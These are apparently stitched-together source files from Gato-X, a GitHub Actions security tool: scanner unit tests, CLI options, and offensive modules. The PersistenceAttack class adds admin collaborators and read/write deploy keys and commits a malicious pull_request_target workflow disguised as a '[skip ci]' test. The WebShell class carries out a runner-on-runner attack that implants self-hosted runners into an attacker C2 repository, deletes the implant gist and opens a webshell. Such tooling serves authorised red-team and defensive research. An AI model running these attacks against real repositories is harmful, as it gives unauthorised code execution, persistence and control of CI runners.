    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {
        "REF": "github.event.repository.default_branch"
    }
    workflow_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "env.REF"  # References environment variable
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="REF"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should process environment variable lookup in checkout metadata
        mock_add_results.assert_called_once()


@pytest.mark.asyncio
async def test_process_single_path_no_sinks_unknown_confidence(
    mock_graph, mock_api, mock_cache_manager
):
    """Test path with no sinks results in unknown confidence"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, checkout_step]

    # Mock the graph DFS calls - no sinks
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return []  # No sinks
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should use UNKNOWN confidence when no sinks found
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["confidence"] == Confidence.UNKNOWN


@pytest.mark.asyncio
async def test_find_pwn_requests_ignore_workflow_run(
    mock_graph, mock_api, mock_cache_manager
):
    """Test find_pwn_requests with ignore_workflow_run=True"""
    node = MagicMock()
    mock_graph.get_nodes_for_tags.return_value = [node]
    mock_graph.dfs_to_tag.return_value = [[node]]

    with patch.object(PwnRequestVisitor, "_process_single_path"):
        await PwnRequestVisitor.find_pwn_requests(
            mock_graph, mock_api, ignore_workflow_run=True
        )

        # Should not include workflow_run in query taglist
        expected_tags = [
            "issue_comment",
            "pull_request_target",
            "pull_request_target:labeled",
        ]
        mock_graph.get_nodes_for_tags.assert_called_once_with(expected_tags)


@pytest.mark.asyncio
async def test_find_pwn_requests_with_dfs_exception(
    mock_graph, mock_api, mock_cache_manager
):
    """Test find_pwn_requests handles DFS exceptions gracefully"""
    node = MagicMock()
    mock_graph.get_nodes_for_tags.return_value = [node]

    # Mock DFS to raise an exception
    mock_graph.dfs_to_tag.side_effect = Exception("DFS error")

    # Should not raise exception, just log error
    result = await PwnRequestVisitor.find_pwn_requests(mock_graph, mock_api)
    assert result == {}


@pytest.mark.asyncio
async def test_find_pwn_requests_with_process_path_exception(
    mock_graph, mock_api, mock_cache_manager
):
    """Test find_pwn_requests handles path processing exceptions gracefully"""
    node = MagicMock()
    mock_graph.get_nodes_for_tags.return_value = [node]
    mock_graph.dfs_to_tag.return_value = [[node]]

    with patch.object(
        PwnRequestVisitor,
        "_process_single_path",
        side_effect=Exception("Process error"),
    ):
        # Should not raise exception, just log warning
        result = await PwnRequestVisitor.find_pwn_requests(mock_graph, mock_api)
        assert result == {}


@pytest.mark.asyncio
async def test_process_single_path_deployment_rule_substring_match(
    mock_graph, mock_api, mock_cache_manager
):
    """Test that deployment matches rule via substring (rule='prod', deployment='production')."""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = ["production"]
    job_node.outputs = None
    job_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, job_node, checkout_step]

    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    # The rule is 'prod', which is a substring of 'production'
    mock_api.get_all_environment_protection_rules.return_value = ["prod"]

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", side_effect=lambda x: x),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):
        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )
        # Should trigger approval gate due to substring match and set TOCTOU complexity
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["complexity"] == Complexity.TOCTOU



import httpx
import pytest


@pytest.fixture(autouse=True)
def block_network_calls(monkeypatch):
    """
    Fixture to block real network calls during tests,
    raising an error if any attempt to send a request is made.
    """

    def mock_request(*args, **kwargs):
        raise RuntimeError("Blocked a real network call during tests.")

    monkeypatch.setattr(httpx.Client, "send", mock_request)
    monkeypatch.setattr(httpx.AsyncClient, "send", mock_request)


@pytest.fixture(autouse=True)
async def no_async_sleep(monkeypatch):
    """
    Fixture to make asyncio.sleep a no-op during tests.
    """

    async def mock_sleep(delay, result=None):
        return result  # Immediately return, effectively doing nothing

    monkeypatch.setattr("asyncio.sleep", mock_sleep)



from gatox.cli.output import Fore, Output, Style
from gatox.util.arg_utils import ReadableFile, StringType


def configure_parser_app(parser):
    """Helper method to add arguments to the app subparser.

    Args:
        parser: sub parser to add arguments to.
    """

    parser.add_argument(
        "--app",
        "-a",
        help="GitHub App ID to authenticate with.",
        metavar=f"{Fore.RED}APP_ID{Style.RESET_ALL}",
        type=int,
        required=True,
    )

    parser.add_argument(
        "--pem",
        help="Path to the GitHub App private key PEM file.",
        metavar=f"{Fore.RED}PATH/TO/PRIVATE_KEY.pem{Style.RESET_ALL}",
        type=ReadableFile(),
        required=True,
    )

    # Create mutually exclusive group for the different operation modes
    operation_group = parser.add_mutually_exclusive_group(required=True)

    operation_group.add_argument(
        "--installations",
        help="List all app installations with metadata including repositories and permissions.",
        action="store_true",
    )

    operation_group.add_argument(
        "--installation",
        "-i",
        help="Enumerate a specific installation by ID.",
        metavar=f"{Fore.RED}INSTALLATION_ID{Style.RESET_ALL}",
        type=int,
    )

    parser.add_argument(
        "--skip-runners",
        "-sr",
        help=(
            f"Do {Output.bright('NOT')} enumerate runners via run-log analysis, this will\n"
            "speed up the enumeration, but will miss self-hosted runners for\n"
            "non-admin users."
        ),
        action="store_true",
    )

    parser.add_argument(
        "--deep-dive",
        "-dd",
        help=(
            "Perform deep dive static analysis, which includes analyzing non-default branches for Pwn Request vulnerabilities.\n"
            "Git is required on the PATH for this feature."
        ),
        action="store_true",
    )

    parser.add_argument(
        "--output-json",
        "-oJ",
        help=("Save enumeration output to JSON file."),
        metavar="JSON_FILE",
        type=StringType(256),
    )



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

from gatox.attack.attack import Attacker
from gatox.attack.payloads.payloads import Payloads
from gatox.cli.output import Output

logger = logging.getLogger(__name__)


class PersistenceAttack(Attacker):
    """Class containing methods for deploying persistence in GitHub repositories."""

    async def invite_collaborators(
        self, target_repo: str, collaborators: list, permission: str = "admin"
    ):
        """Invite outside collaborators to the repository.

        Args:
            target_repo (str): Repository to target (org/repo format)
            collaborators (list): List of GitHub usernames to invite
            permission (str): Permission level for the invitations

        Returns:
            bool: True if successful, False otherwise
        """
        if not await self.setup_user_info():
            return False

        Output.info(f"Attempting to invite collaborators to {target_repo}")

        success_count = 0
        for collaborator in collaborators:
            Output.info(f"Inviting collaborator: {collaborator}")

            result = await self.api.invite_collaborator(
                target_repo, collaborator, permission
            )
            if result:
                Output.result(f"Successfully invited {collaborator} to {target_repo}")
                success_count += 1
            else:
                Output.error(f"Failed to invite {collaborator} to {target_repo}")

        if success_count > 0:
            Output.result(
                f"Successfully invited {success_count}/{len(collaborators)} collaborators"
            )
            return True
        else:
            Output.error("Failed to invite any collaborators")
            return False

    async def create_deploy_key(
        self, target_repo: str, key_title: str = None, key_path: str = None
    ):
        """Create a read/write deploy key for the repository.

        Args:
            target_repo (str): Repository to target (org/repo format)
            key_title (str): Title for the deploy key
            key_path (str): Path to save the private key file

        Returns:
            bool: True if successful, False otherwise
        """
        if not await self.setup_user_info():
            return False

        if not key_title:
            key_title = "Gato-X Deploy Key"

        if not key_path:
            Output.error("Key path is required for deploy key creation")
            return False

        Output.info(f"Creating deploy key for {target_repo}")

        # Generate RSA key pair
        private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
        )

        # Get public key in SSH format
        public_key = private_key.public_key()
        ssh_public_key = public_key.public_bytes(
            encoding=serialization.Encoding.OpenSSH,
            format=serialization.PublicFormat.OpenSSH,
        ).decode("utf-8")

        # Get private key in PEM format for user
        private_key_pem = private_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption(),
        ).decode("utf-8")

        result = await self.api.create_deploy_key(
            target_repo, key_title, ssh_public_key, read_only=False
        )
        if result:
            try:
                # Save private key to specified file
                with open(key_path, "w") as f:
                    f.write(private_key_pem)
                Output.result(f"Successfully created deploy key for {target_repo}")
                Output.info(f"Private key saved to: {key_path}")
                return True
            except Exception as e:
                Output.error(f"Failed to save private key to {key_path}: {str(e)}")
                return False
        else:
            Output.error(f"Failed to create deploy key for {target_repo}")
            return False

    async def create_pwn_request_workflow(
        self, target_repo: str, branch_name: str = None
    ):
        """Create a malicious pull_request_target workflow on a non-default branch.

        Args:
            target_repo (str): Repository to target (org/repo format)
            branch_name (str): Branch name to create the workflow on

        Returns:
            bool: True if successful, False otherwise
        """
        if not await self.setup_user_info():
            return False

        if not branch_name:
            branch_name = "feature/test-workflow"

        Output.info(
            f"Creating malicious pull_request_target workflow on {target_repo}:{branch_name}"
        )

        # Get workflow content from payloads
        workflow_content = Payloads.PWN_REQUEST_WORKFLOW.format(branch_name)

        result = await self.api.create_workflow_on_branch(
            target_repo,
            branch_name,
            "pwn-request.yml",
            workflow_content,
            commit_message="[skip ci] Add test workflow",
            commit_author=self.author_name,
            commit_email=self.author_email,
        )

        if result:
            Output.result(
                f"Successfully created malicious workflow on {target_repo}:{branch_name}"
            )
            Output.info(f"To trigger: Create a PR targeting the '{branch_name}' branch")
            Output.info("Include shell commands in the PR body to execute them")
            return True
        else:
            Output.error(f"Failed to create workflow on {target_repo}:{branch_name}")
            return False



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.attack.attack import Attacker
from gatox.attack.payloads.payloads import Payloads
from gatox.cli.output import Output

from .c2_controller import C2Controller
from .payload_manager import PayloadManager
from .repository_manager import RepositoryManager
from .webshell_utils import WebShellUtils


class WebShell(Attacker):
    """This class wraps implementation to create a C2 repository that can be used to
    connect a runner-on-runner (RoR).

    The steps to create a RoR C2 repository are as follows:

    * Create a repository with a shell.yml workflow that runs on workflow dispatch.
    * The workflow dispatch event will trigger the workflow to run on the runner.
    * The runner will then execute the shell commands in the workflow.

    The attacker can then use the GitHub API to trigger the workflow dispatch event
    and execute commands on the runner.

    The implantation portion will use a self-hosted registration token from the GitHub
    API.

    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.payload_manager = None
        self.c2_controller = None
        self.repository_manager = None

    def _initialize_components(self):
        """Initialize component managers."""
        if not self.payload_manager:
            self.payload_manager = PayloadManager(self.api, self)
        if not self.c2_controller:
            self.c2_controller = C2Controller(self.api, self.user_perms, self.timeout)
        if not self.repository_manager:
            self.repository_manager = RepositoryManager(self.api, self.timeout)

    async def setup_payload_gist_and_workflow(
        self, c2_repo, target_os, target_arch, keep_alive=False
    ):
        """Delegates to PayloadManager."""
        self._initialize_components()
        return await self.payload_manager.setup_payload_gist_and_workflow(
            c2_repo, target_os, target_arch, keep_alive
        )

    async def payload_only(
        self,
        target_os: str,
        target_arch: str,
        requested_labels: list,
        keep_alive: bool = False,
        c2_repo: str = None,
        workflow_name: str = "Testing",
        run_name: str = "Testing",
    ):
        """Generates payload gist and prints RoR workflow."""
        await self.setup_user_info()

        self._initialize_components()

        if not c2_repo:
            c2_repo = await self.payload_manager.configure_c2_repository()
            Output.info(f"Created C2 repository: {Output.bright(c2_repo)}")
        else:
            Output.info(f"Using provided C2 repository: {Output.bright(c2_repo)}")

        _, gist_url = await self.setup_payload_gist_and_workflow(
            c2_repo, target_os, target_arch, keep_alive=keep_alive
        )

        if not gist_url:
            Output.error("Failed to create Gist!")
            return

        ror_workflow = Payloads.create_ror_workflow(
            workflow_name, run_name, gist_url, requested_labels, target_os=target_os
        )

        Output.info("RoR Workflow below:\n")
        print(ror_workflow)

    async def runner_on_runner(
        self,
        target_repo: str,
        target_branch: str,
        pr_title: str,
        source_branch: str,
        commit_message: str,
        target_os: str,
        target_arch: str,
        requested_labels: list,
        keep_alive: bool = False,
        yaml_name: str = "tests",
        workflow_name: str = "Testing",
        run_name: str = "Testing",
        c2_repo: str = None,
    ):
        """Performs a runner-on-runner attack using the fork pull request technique.

        This feature uses the pure git database API to perform operations.
        """
        await self.setup_user_info()
        self._initialize_components()

        if not self.user_perms:
            return False

        if not (
            "repo" in self.user_perms["scopes"]
            and "workflow" in self.user_perms["scopes"]
            and "gist" in self.user_perms["scopes"]
        ):
            Output.error("Insufficient scopes for attacker PAT!")
            return False

        if not c2_repo:
            c2_repo = await self.payload_manager.configure_c2_repository()
            Output.info(f"Created C2 repository: {Output.bright(c2_repo)}")
        else:
            Output.info(f"Using provided C2 repository: {Output.bright(c2_repo)}")

        # Set up target repository (fork, validate, handle conflicts)
        repo_name = await self.repository_manager.setup_target_repository(
            target_repo,
            target_branch,
            source_branch,
            self.author_name,
            self.author_email,
        )
        if not repo_name:
            return False

        gist_id, gist_url = await self.setup_payload_gist_and_workflow(
            c2_repo, target_os, target_arch, keep_alive=keep_alive
        )

        ror_workflow = Payloads.create_ror_workflow(
            workflow_name, run_name, gist_url, requested_labels, target_os=target_os
        )

        Output.info(
            f"Conducting an attack against {Output.bright(target_repo)} as the "
            f"user: {Output.bright(self.user_perms['user'])}!"
        )

        # Deploy workflow to the fork
        if not await self.repository_manager.deploy_workflow(
            repo_name,
            source_branch,
            ror_workflow.encode(),
            yaml_name,
            self.author_name,
            self.author_email,
        ):
            return False

        Output.info("C2 Repo and Fork Prepared for attack!")
        Output.warn(
            "The following steps perform an automated overt attack. Type 'Confirm' to continue."
        )

        user_input = input()

        if user_input.lower() != "confirm":
            Output.warn("Exiting attack!")
            return False

        Output.info("Creating draft pull request!")
        pull_url = await self.repository_manager.create_pull_request(
            repo_name, source_branch, target_repo, target_branch, pr_title
        )
        if not pull_url:
            return False

        # Get current timestamp for workflow filtering
        curr_time = WebShellUtils.get_current_timestamp()

        # Wait for workflow to be triggered
        workflow_id = await WebShellUtils.wait_for_workflow(
            self.api, target_repo, "", yaml_name, f">{curr_time}", self.timeout
        )
        if workflow_id is None:
            Output.error(
                "Failed to find the triggered workflow - actions might be disabled!"
            )
            return False

        Output.info("Closing pull request!")
        await self.repository_manager.close_pull_request(repo_name, source_branch)

        # Get workflow status
        status = await self.api.get_workflow_status(target_repo, workflow_id)
        if status == -1:
            Output.warn("Workflow requires approval!")
            Output.warn("Waiting until timeout in case of approval via other means.")
        else:
            Output.info("Polling for runners!")

        # Wait for runners to connect
        runners = await WebShellUtils.wait_for_runners(self.api, c2_repo, self.timeout)
        if runners:
            Output.info("Deleting implantation Gist.")
            await self.api.call_delete(f"/gists/{gist_id}")
            await self.c2_controller.interact_webshell(
                c2_repo, runner_name=runners[0]["name"]
            )
        else:
            return False

    async def interact_webshell(self, c2_repo: str, runner_name: str = None):
        """Delegates to C2Controller."""
        await self.setup_user_info()
        self._initialize_components()
        return await self.c2_controller.interact_webshell(c2_repo, runner_name)

    async def configure_c2_repository(self):
        """Delegates to PayloadManager."""
        self._initialize_components()
        return await self.payload_manager.configure_c2_repository()

    async def format_ror_gist(
        self,
        c2_repo: str,
        target_os: str,
        target_arch: str,
        keep_alive: bool = False,
    ):
        """Delegates to PayloadManager."""
        self._initialize_components()
        return await self.payload_manager.format_ror_gist(
            c2_repo, target_os, target_arch, keep_alive
        )

    async def issue_command(
        self,
        c2_repo,
        parameter,
        timeout=30,
        workflow_name="webshell.yml",
        runner_name="gato-ror",
        download=False,
    ):
        """Delegates to C2Controller."""
        self._initialize_components()
        return await self.c2_controller.issue_command(
            c2_repo, parameter, timeout, workflow_name, runner_name, download
        )

    async def list_runners(self, c2_repo):
        """Delegates to C2Controller."""
        self._initialize_components()
        return await self.c2_controller.list_runners(c2_repo)



from collections import defaultdict

import yaml


def build_workflow_source_map(workflow_yaml_node: yaml.Node) -> dict:
    source_map = {"jobs": defaultdict(lambda: {"steps": {}, "line": None})}

    if not isinstance(workflow_yaml_node, yaml.MappingNode):
        return source_map

    jobs_node = next(
        (
            value
            for key, value in workflow_yaml_node.value
            if isinstance(key, yaml.ScalarNode)
            and key.value == "jobs"
            and isinstance(value, yaml.MappingNode)
        ),
        None,
    )

    if not jobs_node:
        return source_map

    valid_jobs = filter(
        lambda item: isinstance(item[0], yaml.ScalarNode)
        and isinstance(item[1], yaml.MappingNode),
        jobs_node.value,
    )

    for job_key, job_value in valid_jobs:
        job_name = job_key.value
        source_map["jobs"][job_name]["line"] = job_key.start_mark.line + 1

        steps_node = next(
            (
                job_val
                for job_k, job_val in job_value.value
                if isinstance(job_k, yaml.ScalarNode)
                and job_k.value == "steps"
                and isinstance(job_val, yaml.SequenceNode)
            ),
            None,
        )

        if steps_node:
            source_map["jobs"][job_name]["steps"] = {
                step_index: step_value.start_mark.line + 1
                for step_index, step_value in enumerate(steps_node.value)
            }

    return source_map


def build_composite_source_map(composite_yaml_node: yaml.Node) -> dict:
    source_map = {"steps": {}}

    if not isinstance(composite_yaml_node, yaml.MappingNode):
        return source_map

    runs_node = next(
        (
            value
            for key, value in composite_yaml_node.value
            if isinstance(key, yaml.ScalarNode)
            and key.value == "runs"
            and isinstance(value, yaml.MappingNode)
        ),
        None,
    )

    if not runs_node:
        return source_map

    steps_node = next(
        (
            value
            for key, value in runs_node.value
            if isinstance(key, yaml.ScalarNode)
            and key.value == "steps"
            and isinstance(value, yaml.SequenceNode)
        ),
        None,
    )

    if not steps_node:
        return source_map

    for step_index, step_value in enumerate(steps_node.value):
        source_map["steps"][step_index] = step_value.start_mark.line + 1

    return source_map
